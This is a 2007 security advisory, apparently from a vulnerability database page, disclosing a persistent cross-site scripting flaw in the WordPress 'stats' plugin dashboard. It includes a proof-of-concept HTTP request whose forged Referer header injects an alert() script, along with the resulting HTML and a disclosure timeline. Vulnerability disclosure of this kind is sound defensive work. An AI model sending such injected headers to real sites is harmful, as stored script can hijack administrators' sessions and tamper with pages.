Persistent cross-site scripting in dashboard

Credit: Matteo Carli
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 1. DESCRIPTION OF THE SOFTWARE On May 6th, 2007 a new WordPress plugin called "stats" was released. This plugin allows a WordPress user who has his blog self-hosted to use the statistics. The plugin includes a JavaScript on the blog page to collect statistics from visitors. This statistics include page viewed, search engine keywords, if used, and referrer as well. 2. DESCRIPTION OF THE VULNERABILITY The referrer field is taken from the HTTP header generated by the user with his browser. So it's a user-input and it is possibile therefore to tamper with it. This is a snip of code taken from the stats page of dashboard. ... <a href=''></a> ... If an attacker creates an HTTP request like this, an alert box will be displayed when the blogger reads his stats: GET HTTP/1.1 User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv: Gecko/20070309 Firefox/ Accept:text/xml,application/xml,application/xhtml+xml,text/html; q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language:it,it-it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding:gzip,deflate Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive:300 Connection:keep-alive Referer:'></a><script>alert(/My XSS/)</script><a href=' On the stats page this HTML code will be written: ... <a href=''></a><script>alert(/My XSS/)</script><a href=''>'></a><script>alert(/My XSS/)</script><a href='</a> ... 3. ANALYSIS An attacker could forge the HTTP Referrer so to inject inside it some Javascript code aiming to create a persistent cross-site scripting (XSS). In order to exploit this vulnerability, an attacker can simply request a page controlled by stats plugin and send a special HTTP header. No interaction from the victim is needed. 4. TIME LINE 14/05/2007 - Vendor notified XX/05/2007 - Vendor silently fixed the bug 13/06/2007 - Vendor recontacted 13/06/2007 - Vendor response 19/06/2007 - Public disclosure - -- Matteo Carli matteo at matteocarli dot com | web: GPG keyID: 0xD20BA70A | GnuPG key server: -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGeAMfJbu92NILpwoRAnpBAKCcEymkf6sqGOznqZDdEP4x9lyjmACeMaVX EJ5TPkb6+hpHQtuJw93jvkA= =iZtl -----END PGP SIGNATURE-----

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top